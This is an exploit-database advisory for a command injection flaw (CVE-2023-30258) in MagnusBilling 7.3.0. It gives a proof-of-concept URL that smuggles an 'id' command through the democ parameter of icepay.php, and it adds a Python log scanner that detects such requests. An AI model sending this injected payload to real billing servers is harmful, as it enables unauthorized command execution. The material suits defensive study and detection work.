Vendor: MagnusBilling
By: CodeSecLab
CVSS: 6.1 HIGH
Command Injection
CWE: 78
Product Name: MagnusBilling
Affected Version From: 7.3.2000
Affected Version To: 7.3.2000
Patch Exists: NO
Related CWE: CVE-2023-30258
CPE: magnussolution:magnusbilling:7.3.0
Metasploit:
Other Scripts:
Platforms Tested: Centos
2024

MagnusSolution magnusbilling 7.3.0 – Command Injection

The MagnusSolution magnusbilling 7.3.0 software is vulnerable to command injection. An attacker can exploit this vulnerability by injecting malicious commands through a specific URL, potentially leading to unauthorized command execution.

Mitigation:

To mitigate this vulnerability, sanitize user input: validate and filter input data to prevent the execution of arbitrary commands.
Source

Exploit-DB raw data:

# Exploit Title: MagnusSolution magnusbilling 7.3.0 - Command Injection
# Date: 2024-10-26
# Exploit Author: CodeSecLab
# Vendor Homepage: https://github.com/magnussolution/magnusbilling7
# Software Link: https://github.com/magnussolution/magnusbilling7
# Version: 7.3.0 
# Tested on: Centos
# CVE : CVE-2023-30258


# PoC URL for Command Injection

http://magnusbilling/lib/icepay/icepay.php?democ=testfile; id > /tmp/injected.txt

Result: This PoC attempts to inject the id command.

[Replace Your Domain Name]
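
For defenders, a log check for requests shaped like the PoC above, as an added example that is not part of the original exploit entry or the MagnusBilling project: it scans web-server access log lines for `icepay.php` requests whose `democ` value contains shell metacharacters. The sample log lines, the metacharacter set and the function names are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, unquote, unquote_plus

# Script path and parameter name as they appear in the PoC URL on this page.
TARGET_SUFFIX = "/lib/icepay/icepay.php"
TARGET_PARAM = "democ"
# Characters a POSIX shell treats specially (separators, redirection, quoting,
# substitution, whitespace). Assumed set, chosen for this example.
SHELL_META = set(";&|`$<>(){}\\'\"\n\r\t ")
# Request field of a Common/Combined Log Format line. The lazy match tolerates
# clients that send unencoded spaces in the target.
REQUEST = re.compile(r'"(?P<method>[A-Z]+) (?P<target>.+?) HTTP/[\d.]+"')

# Constructed sample lines (documentation IP ranges, made-up prefix), not real traffic.
SAMPLE_LOG = [
    '203.0.113.5 - - [26/Oct/2024:10:00:01 +0000] "GET /portal/lib/icepay/icepay.php?democ=testfile HTTP/1.1" 200 12',
    '198.51.100.7 - - [26/Oct/2024:10:00:09 +0000] "GET /lib/icepay/icepay.php?democ=testfile;%20id%20%3E%20/tmp/injected.txt HTTP/1.1" 200 0',
    '198.51.100.7 - - [26/Oct/2024:10:00:12 +0000] "GET /index.php?q=a;b HTTP/1.1" 200 512',
]

def inspect_line(line):
    """Return a finding for a democ value carrying shell metacharacters, else None."""
    m = REQUEST.search(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    # Decode the path before comparing so percent-escapes do not hide it.
    if not unquote(parts.path).lower().endswith(TARGET_SUFFIX):
        return None
    for pair in parts.query.split("&"):
        name, _, raw = pair.partition("=")
        if unquote_plus(name) != TARGET_PARAM:
            continue
        value = unquote_plus(raw)  # decoded form, as the server-side script receives it
        found = sorted(SHELL_META.intersection(value))
        if found:
            return {"client": line.split(" ", 1)[0], "value": value, "metachars": found}
    return None

def scan(lines):
    """Return the findings for every suspicious line, in input order."""
    return [hit for hit in map(inspect_line, lines) if hit]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

A hit means the request was received, not that the command ran; confirm on the host before treating it as a compromise.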